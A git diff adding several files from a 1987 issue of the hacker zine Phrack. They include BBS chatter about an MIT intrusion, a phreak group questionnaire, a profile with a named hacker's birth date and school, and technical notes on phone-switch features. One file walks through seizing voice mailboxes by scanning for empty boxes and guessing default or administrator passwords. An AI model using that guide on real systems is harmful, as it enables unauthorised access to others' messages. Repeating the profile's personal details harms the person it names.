+form of nuclear fission that would have been more efficient than using the
+standard hydrogen.  Well, back to the drawing board now.
+
+I realize that it's hard to believe that they would have data like this on
+this system.  But they were quite stupid in many other areas too.  Leaving the
+superuser account with no password??  Think about it.
+
+It's also possible that they were exaggerating.  But regardless, damage seems
+to have been done.
+
+------------------------------------------------------------------------------
+MIT
+Name: Phreakenstein
+Date: 1:31 am  Sun Feb 01, 1987
+
+Heck! I dunno, but whoever it was, I think, should let himself (the s00per
+K-rad elyte d00d he is) be known.
+
+I wasn't on MIT, but it was pretty dumb of MIT to even let Hackers on.  I
+wouldn't really worry though, they did let you on, and all you have to prove
+is that you had no reason to do it.
+
+----Phreak
+------------------------------------------------------------------------------
+I wonder...
+Name: Ax Murderer #15
+Date: 6:43 pm  Sun Feb 01, 1987
+
+I highly doubt that is was someone on this system.  Since this is an elite
+board, I think all the users are pretty decent and know right and wrong things
+to do.  Could be that one of the users on this system called another system
+and gave it out!??  Nahh...shooting the asshole is not enough, let's think of
+something better.
+
+Ax Murderer
+------------------------------------------------------------------------------
+It was stupid
+Name: Druidic Death #12
+Date: 9:21 pm  Sun Feb 01, 1987
+
+It seems to me, or, what I gathered, they felt that there were going to be
+hackers on the system to begin with and that this way they could keep
+themselves basically safe.
+
+I doubt that it was Celtic Phrost, I don't think he'd be an asshole like that.
+But I can't say.  When I posted, I was pretty pissed about the whole deal.
+I've calmed down now.  Psychic Warlord said something to me voice the other
+day that made me stop and think.  What if this was a set up right from the
+start? I mean, MIT won't give me specifics on just what supposedly happened,
+Celtic Phrost denies everything, and the biggest part of it is what George
+said to me.
+
+"We can forgive you for what you did to us if you'll promise to go straight
+and never do this again and just tell us who all of your friends are that are
+on the system".
+
+I didn't pay much attention to that remark at first, now I'm beginning to
+wonder...
+
+I, of course, didn't narc on anyone.  (Who do I know??? hehe)
+
+DRU'
+------------------------------------------------------------------------------
+Well
+Name: Solid State
+Date: 11:40 pm  Sun Feb 01, 1987
+
+Well if they were serious about the FBI, I wouldn't take this too lightly.
+Lately at Stanford there has been a lot of investigators that I've pinpointed
+running around.  This is mainly due to the number of break-ins this summer.
+
+Anyways, if a large college like MIT says they may call in the FBI, be wary,
+but don't over-react.
+
+SOLID STATE
+------------------------------------------------------------------------------
+Comments...
+Name: Delta-Master
+Date: 7:15 am  Mon Feb 02, 1987
+
+It wouldn't surprise me if it was some kind of setup, it's been done before.
+
+Delta-Master
+------------------------------------------------------------------------------
+Oh well...
+Name: Evil Jay
+Date: 8:56 am  Mon Feb 02, 1987
+
+I think your all wrong.  The MIT lines have been around for a long time and
+are widely known among the rodents.  Anyone with a g-file could hack out a
+password on the system so it looks to me like someone just messed around and
+just happened to use Phrost as a flunkie.  Oh well...
+
+-EJ
+------------------------------------------------------------------------------
+All posts taken from:
+               ___
+              /   )
+              \___  |         |            __
+                  \ |_   _   _|  _        (_   _   _        _
+              (___/ | ) ( \ ( | (_) \/\/  __) | ) ( \ \/\/ | )
+                                              |
+      \_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_/
+
+                "We're not ELITE...  we're just cool as hell."
+ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+                 Information Provided indirectly/directly by
+
+         Ax Murderer/Celtic Phrost/Ctrl C/Delta-Master/Druidic Death
+                      Evil Jay/Phreakenstein/Solid State
+______________________________________________________________________________
+
+Phortune 500:  Phreakdom's Newest Organization               February 16, 1987
+----------------------------------------------
+For those of you who are in the least bit interested, Phortune 500 is a group
+of telecommunication hobbyists who's goal is to spread information as well as
+further their own knowledge in the world of telecommunications.  This new
+group was formed by:
+
+       Brew Associates/Handsomest One/Lord Lawless/The Renegade Chemist
+             Quinton J. Miranda/Striker/The Mad Hacker/The Spiker
+
+These eight members are also known as Board Of Directors (BOD).  They don't
+claim to be *Elite* in the sense that they are they world's greatest hackers,
+but they ARE somewhat picky about their members.  They prefer someone who
+knows a bit about everything and has talents exclusive to him/herself.
+
+One of the projects that Phortune 500 has completed is an individual password
+AE type system.  It's called TransPhor.  It was written and created by Brew
+Associates.  It has been Beta tested on The Undergraduate Lounge (Sysoped by
+Quinton J. Miranda).   It is due to be released to the public throughout the
+next few months.
+
+Phortune 500 has been in operation for about 4 months, and has released two
+newsletters of their own.  The Phortune 500 Newsletter is quite like the
+"People" of contemporary magazines.  While some magazines cover the deep
+technical aspects of the world in which we communicate, their newsletter tries
+to cover the lighter side while throwing in information that they feel is "of
+technical nature."   The third issue is due to be released by the end of this
+month.
+ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+             *>=-> The Phortune 500 Membership Questionnaire <-=<*
+
+Note:  The following information is of a totally confidential nature.  The
+       reason you may find this so lengthy and in depth is for our knowledge
+       of you. We, with Phortune 500, feel as though we should know
+       prospective members well before we allow them into our organization.
+       Pending the answers you supply us, you will be admitted to Phortune 500
+       as a charter member.  Please answer the following completely...
+..............................................................................
+
+Handle                          :
+First Name                      :
+Voice Phone Number              :
+Data Phone Number               :
+City & State                    :
+Age                             :
+Occupation (If Applicable)      :
+Place of Employment (Optional)  :
+Work Phone Number   (Optional)  :
+Computer Type                   :
+Modem Type                      :
+Interests                       :
+Areas Of Expertise              :
+References (No More Than Three) :
+Major Accomplishments (If Any)  :
+..............................................................................
+Answer In 50 Words Or Less;
+
+^*^  What Is Phortune 500 in Your Opinion?
+
+^*^  Why Do You Want To Be Involved With Phortune 500?
+
+^*^  How Can You Contribute to Phortune 500?
+..............................................................................
+
+Please answer each question to the best of your ability and then return to any
+Phortune 500 Board of Directors Member Or a Phortune 500 BBS:
+
+           The Private Connection (Limited Membership) 219-322-7266
+           The Undergraduate AE   (Private Files Only) 602-990-1573
+
+                           Information provided by
+
+             Quinton J. Miranda & Phortune 500 Board Of Directors
+______________________________________________________________________________
+
+PWN Quicknote
+-------------
+At the University of Rhode Island there is supposed to be some undercover
+agent for Bay Bell.  Supposedly he hangs out at the library and watches for
+people checking out the Bell Technical Journals.  Then he asks questions like,
+'What do you want those for?' 'Do you know what 2600Hz is?' and other similar
+questions. He isn't registered at the school and of course has no classes.
+[Sounds bogus to me...oh well-KL].       Information by Asmodeus Rex (1/21/87)
+______________________________________________________________________________
+
diff --git a/phrack11/2.txt b/phrack11/2.txt
new file mode 100644
index 0000000..aff1dcc
--- /dev/null
+++ b/phrack11/2.txt
@@ -0,0 +1,135 @@
+                               ==Phrack Inc.==
+
+                   Volume Two, Issue Eleven, Phile #2 of 12
+
+                          ==Phrack Pro-Phile VIII==
+
+                      Written and Created by Taran King
+
+                                   2/17/87
+
+         Welcome to Phrack Pro-Phile VIII.  Phrack Pro-Phile is created to
+bring info to you, the users, about old or highly important/controversial
+people.  This month, I bring to you one of the older and high profile phreaks
+of the past...
+
+                              Wizard of Arpanet
+                              ~~~~~~~~~~~~~~~~~
+
+         Wizard of Arpanet is one of the older of the phreak/hack generation.
+His main accomplishments include running Inner Circle and Secret Service BBS.
+
+                       Handle: Wizard of Arpanet
+                     Call him: Eric
+                 Past handles: The Hacker and The Priest
+                Handle Origin: A real programmer on Arpanet was called The
+                               Wizard and Eric took his handle from him.
+                Date of Birth: 02/26/69
+Age in 9 days of this writing: 18 years old
+                       Height: 6'1"
+                       Weight: 150 lbs
+                    Eye color: Blue
+                   Hair color: Dishwaterish blond
+                    Computers: Atari 400, Commodore 64
+            Sysop/Co-sysop of: Secret Service
+
+------------------------------------------------------------------------------
+         Wizard of Arpanet started as your average BBS caller.  He eventually
+called Central Processing Unit (a local board to him), and there were these
+funny numbers on the board.  He called and tried to connect with his modem,
+but they turned out to be Sprint dial-ups.  The CPU Sysop informed him of what
+to do and he started calling national BBSs.  Boards that helped him to advance
+include the Twilight Zone (the sysop was the guy that wrote T-Net), OSUNY,
+Dragon's Lair, and Delta BBS.  Wizard organized various groups which included
+(from earliest to most recent): PHA (Phreakers and Hackers of America) -
+(included Deep Throat, Phreak King, and Psycho Killer), The Inner Circle (1st
+one) (included Shockwave Rider, and Satan Knight aka Redrum), and The 2nd
+Inner Circle (included The Cracker, Mr. America, Napoleon Bonapart, Stainless
+Steal Rat, Big Brother, Mr. Xerox, Bootleg, Maxwell Wilke, Mandrake The
+Magician, and Zaphod Beeblebrox).
+
+         Eric got the number to Arpanet from Dark Dante, and got on the MIT
+Research System from looking through TAC News.  One night he got like 50-60
+accounts on the Unix and changed all of the passwords to WIZARD.
+
+         Stainless Steal Rat, the Sysop of Delta BBS, and The Myth were all up
+from NJ one weekend, and they were staying the weekend at John Maxfield's
+house.  They went to John's office.  Wizard asked Maxfield if he could use his
+computer to print out some things he had with him and he printed out some
+stuff from the Stanford Artificial Intelligence address list for Arpanet.
+John was amazed.  "Wow," he said, "I have prime evidence on you." (TK: This
+may not for sure be an exact quote).  He then proceeded to bust our friend,
+Eric, the next week.  He also had a lot of stuff from AUTOVON from some fellow
+in Washington and started playing with the FTS lines (Federal Telephone
+System) which he found from, none other than, John Maxfield.  They had found
+the default passwords for TeleMail too, and got the administrator accounts and
+set up their own BBS on Nassau and Coca-Cola systems plus anywhere else
+possible.  And all of a sudden, it all came down when Mandrake decided to
+crash parts of TeleMail.  Enter, Federal Bureau of Investigations.  They had
+been monitoring Eric for 6 months looking for some evidence to get him on.
+And thus, they got it.  Nothing really happened, but he had to get a lawyer
+and he got some publicity in the paper.  After 90 days, everything they had
+taken, with the exception of a few documents, was sent back.  During those 90
+days, Eric worked as a computer security consultant at a bank making $200 an
+hour (2 hours...).
+
+         The only "phreaks" he's met are Stainless Steal Rat and Cable Pair.
+
+         Eric has been mentioned on local TV/News, in newspapers, USA Today,
+NY Times, Washington Post, Books, and Britannica Encyclopedia (look under
+Hacker).
+
+------------------------------------------------------------------------------
+
+         Interests: Music (preferably jazz, reggae, new wave), Eastern
+                    philosophy (Zen Buddhism), reading Jack Kerouac books (a
+                    great beatnik writer), driving aimlessly, slowly becoming
+                    a social recluse, physics, and Greek mathematicians.
+
+Eric's Favorite Things
+----------------------
+
+                    Women: The pursuit thereof (Karen Wilder).
+                    Foods: Chinese.
+                     Cars: BMW 320-I.
+                   Artist: Salvador Dali.
+Plans for next few months: Next year and a half - travelling to Montreal in
+                           April for a week of leisure, then jetting back to
+                           beautiful Detroit and continuing his studies at
+                           Eisenhower High School.
+
+Most Memorable Experiences
+--------------------------
+
+Realizing all at once that everything you did 3 years ago was stupid.
+Growing into a new person.
+Gaining morals and new ideas and a new outlook.
+
+Some People to Mention
+----------------------
+
+Tuc (For telling him about boxing).
+Tom Tone (For calling him on his first conference).
+Magnetic Surfer (Talking to him for the first time after Sherwood Forest went
+                 down voice).
+John Maxfield (Meeting him).
+Stainless Steal Rat (Meeting him...with John Maxfield).
+Dark Dante (One of the legends phreakdom).
+
+------------------------------------------------------------------------------
+
+         Always follow your instinct and not your desire for you will be
+sorry because you will be lying to yourself.
+
+------------------------------------------------------------------------------
+
+I hope you enjoyed this file.  Look forward to more Phrack Pro-Philes coming
+in the near future.  ...And now for the regularly taken poll from all
+interviewees.
+
+Of the general population of phreaks you have met, would you consider most
+phreaks, if any, to be computer geeks?  No, says Eric, he considers them a new
+breed of intellect.  Thanks for your time, Eric.
+
+                                            Taran King
+                                   Sysop of Metal Shop Private
diff --git a/phrack11/3.txt b/phrack11/3.txt
new file mode 100644
index 0000000..149d374
--- /dev/null
+++ b/phrack11/3.txt
@@ -0,0 +1,158 @@
+                               ==Phrack Inc.==
+
+                     Volume Two, Issue Eleven, Phile #3 of 12
+
+             .___.                                              .___.
+             |___|                                              |___|
+             |                                                  |
+            /^\                                                /^\
+         [+]PLP[+]------------------------------------------[+]PLP[+]
+            \^/               ^                 ^              \^/
+            |S|  P          ^[+]The Executioner[+]^         P  |S|
+            |e| PLP       ^[+]PhoneLine Phantoms![+]^      PLP |e|
+            |x|  P _____[+]The Network Technicians[+]______ P  |x|
+            |y|   ^        ------------------------       ^    |y|
+            |-|  [+] PACT: Prefix Access Code Translator [+]   |-|
+            |T|   ^ ====================================  ^    |T|
+            |N|  [+]Written for PHRACK Inc. Issue Eleven.[+]   |N|
+            |T|                                                |T|
+            |-|_______.  Call Phreak Klass, Room 2600  ._______|-|
+            |PHRACK XI| [806][799][0016] Login:EDUCATE |PHRACK XI|
+            --------| |________________________________| |--------
+                    |____________________________________|
+
+
+     The PACT (Prefix Access Code Translator) feature provides preliminary
+translation data for features using access codes that are prefixed by a
+special code. A standard numbering and dialing plan requires that individual
+line and small business customers' (custom) calling use prefixed access code
+dialing for feature access.  PACT is offered on a per office basis. The PACT
+is NOT used for the interpretation of Centrex dialing customers.
+     When a call is originated by the customer, a call register is used to
+store the data about the call. The customer dials a prefix and a 2 digit
+access code (table a). The PACT then looks at the digits to determine what
+action should take place. Reorder or special service error messages will be
+heard if you enter an unassigned code. If the code is accepted, then that
+particular action will be performed. The PACT consists of the PACT head table
+and the prefixed access code translator. The PACT feature allows the dialing
+of a special code for a prefix. These are the '*' and '#'. If you have rotary,
+then '11' and '12' are used respectively. To use PACT, the prefix must be
+followed by a 2-digit code. This combination is then defined in terms of type
+and subtype (table b).
+
+                                   TABLE A
+         ____________________________________________________________
+         | Access Code            |        Description of function  |
+         |________________________|_________________________________|
+         | *2X - *3X (x= 0-9)     | Growth to 2 or 3 digit codes    |
+         |                        | (Future may call for these)     |
+         |                        |                                 |
+         | *4X - *5X - *7X        | Local Area Signalling Services  |
+         |                        |                                 |
+         |       *72              | Call Forwarding Activation      |
+         |                        |                                 |
+         |       *73              | Call Forwarding Deactivation    |
+         |                        |                                 |
+         |       *74              | 1-digit speed dialing           |
+         |                        |                                 |
+         |       *75              | 2-digit speed dialing           |
+         |                        |                                 |
+         |       #56              | Circuit Switched Digital        |
+         |                        | Capability                      |
+         |________________________|_________________________________|
+
+    The subtranslator is always built 100 words long. A word is a binary code
+which, when sent as a whole, act as a command. One word is equal to a 2-digit
+access code. This subtranslator contains the PTW (Primary Translation Word).
+The PTW contains the feature type subtype and feature subtype index to
+determine the function of the dialed code. The feature subtype allows four
+subtype tables to exist for feature type 31 (LASS). Index 0 is for LASS. Index
+1 is used for LASS on a pay per usage basis. Index 2 and 3 are currently not
+used.
+
+                       TABLE B (written in report form)
+                       ================================
+
+Feature Type: 0 (Unassigned)
+
+Feature Type: 1 (1-digit abbr. dialing)
+
+   Subtypes: 0 (Speed Call)
+             1 (Change the Speed Call List)
+             2 (Invalid)
+
+Feature Type: 2 (2-digit dialing.)
+
+   Subtypes: (Same as Feature 1)
+
+Feature Type: 3 (Circuit Switch Digital Capability)
+
+   Subtype: 1 (CSDC 56 kilo bit service)
+
+Feature Type: 4 (Usage Sensitive 3-way)
+
+Feature Type: 5 (Cancel Call Waiting)
+
+Feature Type: 20 (Call Forwarding Activate)
+
+Feature Type: 21 (Call Forwarding deactivate)
+
+Feature Type: 22 (Project Acct. Service (Autoplex))
+
+Feature Type: 26 (Customer changeable Inter LATA carrier)
+
+Feature Type: 27 (Voice/Data Protection)
+
+Feature Type: 28 (MDS-Message Desk Service)
+
+   Subtypes: 0 (MDS activation)
+             1 (MDS deactivation)
+
+Feature Type: 30 (Residence Data Facility Pooling)
+
+Feature Type: 31 (Local Area Signalling Services-LASS)
+[index 0]
+
+   Subtypes: 0 (AR-Automatic Recall {Incoming Calls})
+             1 (AR-Outgoing calls)
+             2 (AR activation incoming/outgoing)
+             3 (AR deactivation)
+             4 (Customer Originated Trace Activation)
+             5 (Distinctive Alert Activation)
+             6 (ICLID activation)
+             7 (Selective Call Rejection Activation)
+             8 (Selective Call Forwarding activation)
+             9 (Private Call Activation)
+            10 (Distinctive Alert -OFF)
+            11 (ICLID-OFF)
+            12 (SCR-OFF)
+            13 (SCF-OFF)
+            14 (Private Call-OFF)
+            15 (Distinctive Alert ON/OFF) toggle for opposite
+            16 ICLID toggle on/off
+            17 SCR toggle on/off
+            18 SCF toggle on/off
+            19 Private Call on/off
+            20 Selective Call Acceptance-ON
+            21 SCA OFF
+            22 SCA toggle on/off
+            23 (Computer Access Restriction) on
+            24 CAR off
+            25 CAR on/off
+         26-31 (reserved for future LASS functions)
+
+Index 1 Pay Per View
+
+       subtype: 0 (Order placement)
+                1 (Order Cancel)
+
+     The PACT function is extremely important for LASS functions. PACT is what
+lets you tell your switch what you want done. Without the PACT, communication
+between you and your CO would not exist. PACT is the base foundation for the
+use access codes.
+         ============================================================
+         = If you have any questions or comments, please leave mail =
+         = either on Phreak Klass Room 2600 or at 214-733-5283.     =
+         ============================================================
+         = (c) The Executioner/PLP/TNT                              =
+         ============================================================
diff --git a/phrack11/4.txt b/phrack11/4.txt
new file mode 100644
index 0000000..fe86ec8
--- /dev/null
+++ b/phrack11/4.txt
@@ -0,0 +1,101 @@
+                               ==Phrack Inc.==
+
+                   Volume Two, Issue Eleven, Phile #4 of 12
+
+             +=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
+             +=+         Hacking Voice Mail Systems          +=+
+             +=+           Written for Phrack XI             +=+
+             +=+         by:-> Black Knight from 713         +=+
+             +=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
+
+
+Voice Mail is a relatively new concept and not much has been said about it.
+It is a very useful tool for the business person and the phreak.  The way it
+works is that somebody wishing to get in touch with you calls a number,
+usually a 1-800, and punches in on his touch-pad your mailbox number and then
+he is able to leave a message for you.  Business experts report that this
+almost totally eliminates telephone tag.  When a person wishes to pick up his
+message all he needs to do is call the number enter a certain code and he can
+hear his messages, transfer them, and do other misc. mailbox utilities.
+
+Most VMSs are similar in the way they work.  There are a few different ways
+the VMSs store the voice.  One way is that the voice is recorded digitally and
+compressed and when heard it is reproduced back into the voice that recorded
+it. Another method that is slower and uses more space, but costs less, stores
+the voice on magnetic tape, the same type that is used to store data on a
+computer, and then runs the tape at a slow speed.  Using this method the voice
+does not need to be reproduced in any way and will sound normal as long as the
+tape is running at a constant speed.  On some of the newer VMSs the voice is
+digitally recorded and is transformed from the magnetic tape at about 2400
+bits per second.
+
+There are many different types and versions of voice mail systems.  Some of
+the best and easiest to get on will be discussed.
+
+Centagram
+---------
+These are direct dial (you don't have to enter a box number).  To get on one
+of these, first have a number to any box on the system.  All of the other
+boxes will be on the same prefix; just start scanning them until you find one
+that has a message saying that person you are calling is not available.  This
+usually means that the box has not been assigned to anybody yet.  Before the
+nice lady's voice tells you to leave the message, hit #.  You will then be
+prompted for your password.  The password will usually be the same as the last
+four digits of the box's number or a simple number like 1000, 2000, etc.  Once
+you get on, they are very user friendly and will prompt you with a menu of
+options.  If you can't find any empty boxes or want to do more, you can hack
+but the system administrators box, which will usually be 9999 on the same
+prefix as the other boxes, will allow you to hear anybody's messages and
+create and delete boxes.
+
+Sperry Link
+-----------
+These systems are very nice.  They will usually be found on an 800 number.
+These are one of the hardest to get a box on because you must hack out a user
+ID (different from the person's box number) and a password.  When it answers,
+if it says, "This is a Sperry Link voice station.  Please enter your user ID,"
+you will have to start trying to find a valid user ID.  On most Sperrys it
+will be a five digit number.  If it answers and says, "This is an X answering
+service," you first have to hit *# to get the user number prompt.  Once you
+get a valid user number will have to guess the password on most systems, it
+will be 4 digits.  Once you get in, these are also very user friendly and have
+many different options available.
+
+RSVP
+----
+This is probably one of the worst VMSs but it is by far the easiest to get
+yourself a box.  When it answers you can hit * for a directory of the boxes on
+it (it will only hold 23).  If you hit # you will be given a menu of options
+and when you choose an option you will then be prompted for your ID number.
+The ID number on an RSVP system will just about always be the same as the
+mailbox number, which are always only 2 digits.
+
+A.S.P.E.N.
+----------
+The Aspen voice message systems made by Octel Telecommunications is in my
+opinion the BEST VMS made.  To get a box on an Aspen, you need to find an
+empty box.  To find an empty box, scan the box numbers and if one says, "You
+entered XXXX.  Please leave a message at the tone," then this is an empty box.
+You next just press # and when prompted for your box number enter the number
+of the empty box and friendly voice of the nice lady will guide you through
+all of the steps of setting up your box.  She first tells you what you can do
+with the box and then will prompt you with, "Please enter the temporary
+password assigned to you by your system manager."  This password will usually
+be 4 digits long and the same as the box number like 1000, etc.  Once you get
+on their are many things you can do.  You can make a distribution list where
+if you want to leave a certain message to more than one person, you can enter
+the list number and all of the boxes on the list will get the message. You can
+also have the system call you and notify you that you have new messages. These
+systems also have what they call "Information center mailboxes" that are
+listen only and can also have a password on them so the person calling has to
+enter the password before he hears the greeting message.  Aspen VMSs have a
+system managers mailbox that will just about give you total control of the
+whole system and let you listen to people's mail, create and delete boxes, and
+many other things.
+
+Thank you for reading this file and if you would like to get in touch with me
+VIA VOICE MAIL call 1-800-222-0311 and hit *2155.
+
+                        //--Black Knight from 713--\\
+                        |     for PHRACK XI (1987)  |
+                        \\--++--++--++--++--++--++-//
diff --git a/phrack11/5.txt b/phrack11/5.txt
new file mode 100644
index 0000000..1bfd638
--- /dev/null
+++ b/phrack11/5.txt
@@ -0,0 +1,97 @@
+                               ==Phrack Inc.==
+
+                   Volume Two, Issue Eleven, Phile #5 of 12
+
+                           {Simple Data Encryption}
+                         <or digital electronics 101>
+                               By:{The Leftist}
+
+Prologue:
+
+Well, it's been awhile since I've done one of my activities files. This time
+I've switched from chemistry to electronics. Hopefully, I will be writing
+more files similar to this one. Also, I have devised a more sophisticated
+encryption device, which I may release in the future
+
+Do you run a BBS, living in fear that the "feds" are gonna log on, and fool
+you into giving them a password? Do you wish that you could limit exactly WHO
+logs onto your board? Well, this file is just for you..
+
+Parts:
+
+1:9 volt battery
+
+1: 74hc/hct04 cmos hex inverter <about .50 cents>
+
+Some basic knowledge of electronics might help, and some wire would be helpful
+too. If you want to be fancy you can even splurge and get a 9 volt connector.
+
+Note: Although it is not required that you put this on an etched PC board, you
+can do this quite easily, and it makes for a much cleaner job.
+
+Ok, the basic idea behind this scheme is this:
+
+Data coming to and going from your modem is translated as 1's and 0's. This
+represents highs and lows, which translate out to code which your computer
+recognizes as valid data. Now, if you could switch all those 1's to 0's, and
+0's to 1's, then you would have a simple way of encrypting your data. That's
+exactly what the hex inverter does. If it sees a 0, it makes it a 1. If it
+sees a 1, it makes it a 0. So, what you want to do is have an inverter on your
+send line, and an inverter on your receive line. The computer you are
+connected to must also have inverters on its send and receive, or all you will
+see will be garbage! I tried to be as non-technical as possible in this for
+all you non-technical types out there.
+
+
+Connections:
+
+Hold the chip, and look at it. There should be a little notch in one end. Hold
+it as illustrated in the schematic:
+
+(80 columns)
+
+
+       ______________________________
+       |                             |
+      14 13 11 12 10 9 8             |
+       |  |  |  |  | |  |            |
+       __________________            |
+      |                  |           |_ to positive on battery
+      \   74hc/hct04     |
+      /                  |
+      |__________________|             to negative on battery
+       |  |  |  |  |  | |              |
+       1  2  3  4  5  6 7______________|
+       |  |  |  |
+       |  |  |  |_________________________________to computer port
+       |  |  |_______________________________from modem
+       |  |________________________________________________to modem conn.
+       |________________________________________________ from computer port
+
+
+<all other pins are not connected>
+
+
+Ok, hook the + 9volts up to pin 14, and the negative up to pin 7.
+There are 6 inverters on this chip. For this, we will be using only 2 of them.
+
+Find the wire coming from your computer to the send data line on your modem.
+Sever this wire, and hook one side of it to pin 1. Hook the other end of it to
+pin 2. Next, find the receive data line, and sever it. Hook one end of it to
+pin 3, the other end to pin 4. That's about it.. if you want to use the other
+inverters on the chip, here's the complete pinouts.
+
+Pin#            Name and function
+----            -----------------
+1,3,5,9,11,13   Data inputs
+---------------------------------
+2,4,6,8,10,12   Data outputs
+---------------------------------
+7               Ground
+---------------------------------
+14              VCC
+---------------------------------
+
+Remember, that your BBS modem must have one of these devices on it, as well as
+the user calling. I have tested this on Smartmodems, and it does work. If you
+have an internal modem, this may be a little difficult for you.
diff --git a/phrack11/6.txt b/phrack11/6.txt
new file mode 100644
index 0000000..86f4a75
--- /dev/null
+++ b/phrack11/6.txt
@@ -0,0 +1,270 @@
+                               ==Phrack Inc.==
+
+                   Volume Two, Issue Eleven, Phile #6 of 12
+
+                            Taran King Presents...
+
+                       AIS - Automatic Intercept System
+
+             The DAIS II System by Computer Consoles Incorporated
+
+INTRODUCTION...
+~~~~~~~~~~~~~~~
+         Computer Consoles Incorporated (CCI) manufactures various hardware
+appliances to be used in conjunction with phone companies switches as well as
+other aspects of the companies' uses, plus computer systems such as their own
+Unix-supporting systems.
+         DAIS II is the Distributed Automatic Intercept System, which is the
+system used to announce if the subscriber has dialed a non-working number.
+This is what you hear, in action, when you dial a wrong number and get the 3
+tones plus the announcement or the ONI (Operator Number Identification)
+intercept operator ("What number did you dial?").
+         The information from this file comes mostly from an instructional
+manual sent to me by CCI, who can be reached at 800-833-7477 or 716-482-5000
+directly, or may be written to at 97 Humbolt Street, Rochester, NY, 14609.
+
+INTERCEPTION
+~~~~~~~~~~~~
+         Most definitely any person who has used a telephone in his life has,
+by some means or another, come across the dreaded 3 tones, leading up to the
+ever-so-cumbersome announcement telling of the disconnected or non-working
+number.  This file will go into how the whole system works.
+         After dialing the non-working number, the telco's Class 5 End Office
+routes the call to DAIS II.
+
+ANI Calls
+~~~~~~~~~
+         Provided that the End Office has Automatic Number Identification
+(ANI) equipment, the equipment then identifies the digits of the called number
+and sends them to the intercept system.
+         The system receives the called number from the end office, retrieves
+information for that number from the intercept database, formulates the
+message, and delivers it to the customer in an automated announcement.  These
+announcements can either be standardized or tailored to the independent
+telephone companies' needs.  If further assistance is required, the caller can
+then stay on the line and wait for an operator to come onto the line.
+
+ONI Calls
+~~~~~~~~~
+         When the End Office is primitive, and they don't have the ANI
+equipment to do the above ritual, operators are directly involved.  These
+operators are also called into action when there is an ANI or DAIS II failure.
+         When the ONI (Operator Number Identification) call comes in, DAIS II
+routes the call to the operator.  The operator asks for the number that the
+customer called and then keys it into her KDT (Keyboard Display Terminal).
+After she hits the command key, the number's information is searched for in
+the intercept database, the message is formulated, and the automated response
+is announced.  Once again, if the caller needs further assistance, an operator
+will return to the line to help the subscriber.
+
+         Operators will return to the line for any number of reasons.  They
+include the following:
+
+Unsuccessful Searches - After DAIS II receives the called number from ANI
+                        equipment or from an operator, it searches the
+                        database to find the intercept message associated with
+                        the telephone number.  The database contains all
+                        10,000 line numbers for each exchange in the calling
+                        area.  If the system cannot complete the search, the
+                        number was either keyed in incorrectly or there is a
+                        problem in the system.  The call is then routed to an
+                        operator and displays the intercepted number
+                        (including NPA) on the KDT screen along with a message
+                        indicating why the search could not be completed.  If
+                        the number was keyed in wrong, the operator will
+                        correct the number, or else she will ask the
+                        subscriber to re-dial the number.
+Aborted Announcements - If a search is given successful but for one reason or
+                        another the automated announcement cannot be given,
+                        the call is routed to an operator.  The KDT display
+                        shows the intercepted number, the appropriate
+                        information for a verbal response, and the message,
+                        "VERBAL REPORT."  In this case, the operator quotes
+                        the message to the caller rather than activating the
+                        automated response.
+Reconnects            - If a customer remains on the line for more information
+                        after receiving the automated announcement, the system
+                        routes the call to an operator.  The operator's KDT
+                        display shows the called number plus other pertinent
+                        information given to the caller in the previous
+                        announcement.  From here, the operator can respond
+                        verbally to the customer's needs, or activate the
+                        automated system again.  The DAIS II system allows up
+                        to 4 reconnects per call, but the possible number of
+                        reconnects available ranges from 0-3.  With 1
+                        reconnect, the operator must report verbally.
+Split Referrals       - If a number has been changed but replaced with two
+                        numbers, this is called a "split referral."  When the
+                        database finds 2 or more numbers, the DAIS II system
+                        routes the customer to an operator, displaying the old
+                        number and new listings on the KDT screen.  The
+                        operator then asks which number they are looking for
+                        and keys in the command key to activate the
+                        announcement, or else they do the announcement
+                        verbally.
+
+Operator Searches
+~~~~~~~~~~~~~~~~~
+         Situations may arise where the subscriber needs more information
+than was given by the automated announcement, or believes the information to
+be invalid.  DAIS II provides for operators to have access to both the
+intercept and the DA databases at all times as long as the system
+administrator, who judges the extent to which operators can use the
+cross-search capability, allows it.
+
+Components Of The System
+~~~~~~~~~~~~~~~~~~~~~~~~
+         The telco's Class 5 End Offices contain switching equipment that
+routes calls to DAIS II.  If the office has ANI equipment, the switch routes
+the called digits to the intercept system in the form of multi-frequency
+tones.  The end offices route calls to DAIS II on dedicated (direct) trunks.
+These direct trunks can carry ANI traffic or ONI traffic, but not both.
+
+         If trunk concentrators are used, the concentrator trunks to DAIS II
+may carry ANI calls, ONI calls, or both, depending on the types of trunks
+coming into the concentrators from the end offices.  The call is identified as
+ANI or ONI through MF tones transmitted by the concentrators.
+
+         If an operator must be involved (due to ONI or further assistance),
+DAIS II routes the call to the telco's ACD (Automatic Call Distributor), which
+is a switching device that routes calls to any available operator.
+
+         The intercept data base resides on disk in the ARS (Audio Response
+System).  ARS processors known as Audio Response Controllers (ARCs) search the
+intercept database.  If a call requires an operator's services, the Marker
+Decoder Unit (MDU) provides ACD routing information to the ARC.
+
+         The DAIS II Automatic Intercept Communications Controllers (AICCs)
+route messages between the ARCs and the DAIS II subsystems.  An intercept
+subsystem that is housed at the same location as the database is called a
+Colocated Automated Intercept System (CAIS).  A subsystem located at a
+distance from the database is known as a Local Automated Intercept System
+(LAIS).  Each subsystem can provide automated announcements without using
+expensive trunking to route ANI calls to a centralized intercept office.  Only
+calls that require operator assistance are routed on trunks to the ARS site.
+Because those trunks are only held white the operator identifies the number
+and are released before the announcement begins, trunk requirements are
+reduced.  The automated announcement is always given by the intercept
+subsystem.
+
+         Each CAIS or LAIS site contains a Trunk Time Switch (TTS) and DAIS II
+Audio Response Units (DARUs).  Intercept trunks from the concentrators and the
+Class 5 End Offices terminate at the TTS.  When an ONI call comes in on one of
+these trunks, the TTS routes it to the ACD.  When an ANI call comes in, the
+TTS routes the called number to the ARC.  After the ARC retrieves the
+appropriate message from the database, it sends that information back to the
+TTS, which connects a DARU port to the trunk on which the call came in.  Then,
+the DARU produces an automated announcement of the message and delivers it to
+the caller.  ARS hardware generates only DA announcements whereas DAIS II
+hardware generates only intercept announcements.
+
